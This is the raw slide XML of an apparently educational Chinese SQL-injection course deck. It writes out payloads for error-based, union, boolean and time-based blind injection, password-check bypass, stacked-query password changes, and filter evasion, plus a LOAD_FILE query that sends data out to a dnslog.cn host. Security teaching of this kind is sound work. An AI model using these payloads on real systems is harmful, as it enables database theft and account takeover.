                <a:ext cx="1637453" cy="1845733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1" rIns="91440" bIns="45721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zh-CN" altLang="en-US" sz="2025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输入用户名：</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2025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admin</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="2025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输入密码：</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2025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admin@123</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endPara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下箭头 14"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="17946727">
                <a:off x="3060523" y="5018103"/>
                <a:ext cx="521547" cy="590973"/>
              </a:xfrm>
              <a:prstGeom prst="downArrow">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="E4391C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1" rIns="91440" bIns="45721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025" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="爆炸形 2 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="329435">
              <a:off x="6612199" y="5153185"/>
              <a:ext cx="1769552" cy="1270998"/>
            </a:xfrm>
            <a:prstGeom prst="irregularSeal2">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FB72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1" rIns="91440" bIns="4572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25" dirty="0">
                  <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>登陆成功！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165" y="2308860"/>
            <a:ext cx="5295265" cy="1461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9600"/>
              <a:t>答疑时间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利用方式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02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注入攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>基础</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参数类型分类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082655" cy="2480945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数字型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输入的参数为整型，常见的如用户</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、年龄、页码等</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>字符型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输入的字符为字符串，常见的如姓名、地址等‘</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>123456</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>’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6595" y="4485005"/>
            <a:ext cx="108318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区别：数字类型不需要单引号闭合，而字符串类型一般要使用单引号来闭合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示 17"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="880919" y="573244"/>
          <a:ext cx="10430163" cy="57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注入攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基础</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通用检测方式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注入攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基础</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>回显类型分类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显注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注入后，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>界面返回指定的数据或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库引擎报错信息，攻击者可直接从返回信息中获取到所需的数据</a:t>
            </a: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盲注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注入后，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>界面不直接返回数据库的数据，需要通过其他方式获取到数据库中的数据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盲注又分为基于时间的盲注、基于布尔的盲注、基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>dnslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的盲注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）基于时间的盲注：注入时加入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>sleep()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，根据页面响应延迟判断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）基于布尔的盲注：注入时加入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>if()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断，根据页面返回数据的变化判断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）基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>dnslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的盲注：注入时，将数据通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求方式外传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注入攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基础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不同类型盲注的优劣势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18490" y="1381760"/>
          <a:ext cx="11082020" cy="412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速度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隐蔽性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是否需要出网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难度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基于时间的盲注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极慢，效果不好，网站延迟大情况下容易出错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请求频繁，容易被安全设备检测出来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简单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基于布尔的盲注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慢，效果持平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请求频繁，容易被安全设备检测出来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简单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dnslog</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US"/>
                        <a:t>的盲注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快，效果好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相对以上两种隐蔽性好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额外需要</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN"/>
                        <a:t>dnslog</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US"/>
                        <a:t>服务器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Linux+MySQL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US"/>
                        <a:t>不适用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单引号报错注入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19792"/>
            <a:ext cx="11082491" cy="48681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参数中加入单引号，导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句单引号不能闭合，引发报错</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>传入参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>=1234'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT * FROM users WHERE id=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1234'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>' LIMIT 0,1;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936875"/>
            <a:ext cx="10471150" cy="3813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基于报错回显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19792"/>
            <a:ext cx="11082491" cy="48681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将所需要的数据作为错误回显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id=1' union select 1,updatexml(1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>concat(0x7e,database())</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>,1) -- 1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UPDATEXML (XML_document, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XPath_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>, new_value); 由于指定数据不符合XPath_string的标准，所以会报错</a:t>
            </a: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3682365"/>
            <a:ext cx="8687435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- “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>万能密码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4868138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or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>改变登录验证的逻辑，绕过密码验证</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>传入参数passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=1' or username='admin' -- 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>SELECT username, password FROM users WHERE username='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>' and password='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1' or username='admin' -- 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>' LIMIT 0,1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45" y="2746375"/>
            <a:ext cx="8342630" cy="4015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– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基于布尔的盲注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28491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查询语句中“真”和“假”返回的页面不一样，构造逻辑判断的语句，判断数据库中的数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>id=1' and 1=1 -- 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>You are in…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>id=1' and 1=2 -- 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，没有返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>You are in…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，说明存在该漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>id=1' and length(database())=7 -- 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，说明数据库名长度不是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id=1' and length(database())=8 -- 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，说明数据库名长度是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8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2" y="3752732"/>
            <a:ext cx="4872037" cy="1396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2" y="5256793"/>
            <a:ext cx="4872037" cy="1396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441" y="5256792"/>
            <a:ext cx="4872037" cy="13961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441" y="3752732"/>
            <a:ext cx="4872037" cy="13961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– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基于时间的盲注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3477254"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>构造逻辑判断加上时间延迟，根据时间延迟判断逻辑判断是否成立</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>id=1' and sleep(3) -- 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>构成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SELECT * FROM users WHERE id='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1' and sleep(3) -- 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>' LIMIT 0,1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>根据延迟判断存在该漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>id=1' and if(length(database())=8 ,sleep(3),true) -- 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>构成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>SELECT * FROM users WHERE id='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1' and if(length(database())=8 ,sleep(3),true) -- 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>' LIMIT 0,1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>根据延迟判断数据库名称长度等于</a:t>
            </a:r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7" y="4444543"/>
            <a:ext cx="5477723" cy="2290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99" y="4444543"/>
            <a:ext cx="6014350" cy="22905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– </a:t>
            </a:r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dnslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>盲注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3477254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sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发起一个网络请求，将需要外传的数据拼接到请求的域名中，当服务器解析域名时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器将收到外传的数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>id=1' AND (LOAD_FILE(CONCAT('\\\\mark-',VERSION(),'-mark.n0hx4a.dnslog.cn\\111'))) -- 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE id='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1' AND (LOAD_FILE(CONCAT('\\\\mark-',VERSION(),'-mark.n0hx4a.dnslog.cn\\111'))) -- 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>' LIMIT 0,1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>日志收到mark-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10.1.38-MariaDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>-mark.n0hx4a.dnslog.cn的请求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576955"/>
            <a:ext cx="6962140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75" y="3577590"/>
            <a:ext cx="476885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联合查询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4868138"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>采用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>查询，获取其他表的信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>传入参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>id=1' UNION (SELECT 0,User,Password FROM mysql.user) ORDER BY id; -- 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE id='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1' UNION (SELECT 0,User,Password FROM mysql.user) ORDER BY id; -- 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>' LIMIT 0,1;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>成功从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>库的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>表中获取到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>用户的密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，并且能够解密出明文密码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" y="3378200"/>
            <a:ext cx="11776075" cy="3462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5564505"/>
            <a:ext cx="5170805" cy="11982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常见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堆叠查询注入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000742"/>
            <a:ext cx="11082491" cy="4868138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;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>符号，将多条</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句叠加一起执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>堆叠查询注入危害更大，可以执行任何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sz="2400" dirty="0"/>
              <a:t>id=1';update users set password='test' where username='Dumb';-- 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>SELECT * FROM users WHERE id='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1';update users set password='test' where username='Dumb';-- 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>' LIMIT 0,1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>成功修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Dumb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用户的密码成为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>test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1" y="3597783"/>
            <a:ext cx="6782200" cy="3192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进阶利用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 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为什么需要绕过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987306"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网站或者安全防护设备中，对传入参数进行了一些敏感字符过滤，导致无法成功注入，需要通过一些手段绕过敏感字符过滤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49929"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="911285" y="5112527"/>
            <a:ext cx="4053822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774" y="2369048"/>
            <a:ext cx="6211917" cy="4488952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618277" y="2740621"/>
            <a:ext cx="4953581" cy="1352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图上可看到传入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>id=1' or 1=1 1='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，但空格，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>都被过滤，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句会报错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进阶利用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 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注释过滤绕过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--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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符进行了过滤，导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句单引号无法闭合</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>id=1' or 1=1 -- 1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被过滤掉后，变成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>id=1' or 1=1  1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>SELECT * FROM users WHERE id='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1' or 1=1  1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>' LIMIT 0,1单引号没有闭合，语句执行报错</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过手动增加单引号进行闭合，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>id=1' or 1=1 or 1='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SELECT * FROM users WHERE id='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1' or 1=1 or 1='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>' LIMIT 0,1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4549775"/>
            <a:ext cx="5463540" cy="1980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015" y="4549775"/>
            <a:ext cx="57054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进阶利用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 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>逻辑运算过滤绕过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进行过滤，导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>执行报错</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>id=1' or 1=1 -- 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤后变成id=1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 1=1 -- 1，运行报错、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and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>替换成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>anandd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
